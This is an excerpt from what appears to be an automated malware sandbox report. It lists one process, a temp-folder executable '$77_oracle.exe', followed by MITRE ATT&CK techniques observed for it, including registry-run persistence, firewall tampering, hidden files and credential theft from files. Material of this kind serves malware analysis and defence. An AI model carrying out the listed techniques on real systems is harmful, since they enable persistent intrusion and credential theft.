C:\Users\Admin\AppData\Local\Temp\Files\$77_oracle.exe
1⤵
PID:1476

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Scheduled Task/Job

Scripting

T1064

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Scripting

T1064

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

System Information Discovery